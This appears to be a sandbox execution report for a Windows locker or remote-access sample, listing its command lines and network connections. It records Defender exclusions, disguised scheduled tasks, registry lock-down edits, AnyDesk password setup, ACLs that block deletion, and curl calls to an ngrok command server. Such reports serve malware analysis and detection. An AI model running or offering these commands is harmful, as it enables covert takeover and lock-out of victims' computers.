"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1

C:\ProgramData\AnyDesk.exe

"C:\ProgramData\AnyDesk.exe" --service

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6064 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1

C:\ProgramData\AnyDesk.exe

"C:\ProgramData\AnyDesk.exe" --control

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --remove-password

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --set-password

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://spankbang.com/tv/?station=hypno+joi

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cc5346f8,0x7ff9cc534708,0x7ff9cc534718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4f4 0x4ec

C:\Users\Admin\AppData\Roaming\locked.exe

"C:\Users\Admin\AppData\Roaming\locked.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\86DE.tmp\86DF.tmp\86E0.bat C:\Users\Admin\AppData\Roaming\locked.exe"

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7176 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f

C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe

C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk

C:\Windows\system32\timeout.exe

timeout /t 5 /nobreak

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"

C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe

C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk

C:\Windows\system32\schtasks.exe

schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData\stn.exe" /RL highest /SC ONLOGON /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData\Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData\svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData\conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /run /tn "MicrosoftEdgeUpdateTaskList"

C:\ProgramData\Anydesk.exe

C:\ProgramData\Anydesk.exe

C:\Windows\system32\schtasks.exe

schtasks /run /tn "SystemTaskNavigator"

C:\ProgramData\stn.exe

C:\ProgramData\stn.exe

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\B3EB.tmp\B3EC.bat C:\ProgramData\stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)

C:\Windows\system32\timeout.exe

timeout /T 30 /NOBREAK

C:\ProgramData\Anydesk.exe

"C:\ProgramData\Anydesk.exe" --control

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --remove-password

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --set-password

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\ProgramData\Anydesk.exe" --get-id

C:\ProgramData\AnyDesk.exe

C:\ProgramData\Anydesk.exe --get-id

C:\Windows\system32\curl.exe

curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"message\": \"Admin-786591712\"}" https://guiding-cheetah-vast.ngrok-free.app/webhook

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -s -X GET https://guiding-cheetah-vast.ngrok-free.app/command

C:\Windows\system32\curl.exe

curl -s -X GET https://guiding-cheetah-vast.ngrok-free.app/command

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4236 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7848 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7872 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6948 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4244 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7984 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8124 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7868 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7696 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8444 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7540 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4228 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 rb.gy udp
US 44.196.17.179:80 rb.gy tcp
US 44.196.17.179:80 rb.gy tcp
US 8.8.8.8:53 iplogger.cn udp
US 104.21.14.168:443 iplogger.cn tcp
US 8.8.8.8:53 cdn.jsdelivr.net udp
US 151.101.193.229:443 cdn.jsdelivr.net tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 179.17.196.44.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 168.14.21.104.in-addr.arpa udp
US 8.8.8.8:53 counter.yadro.ru udp
RU 88.212.201.198:443 counter.yadro.ru tcp
US 8.8.8.8:53 pay.google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 stun.l.google.com udp
US 8.8.8.8:53 stun.fpapi.io udp
NL 142.250.102.92:443 pay.google.com tcp
US 8.8.8.8:53 229.193.101.151.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 198.201.212.88.in-addr.arpa udp
US 74.125.250.129:19302 stun.l.google.com udp
NL 142.250.102.92:443 pay.google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
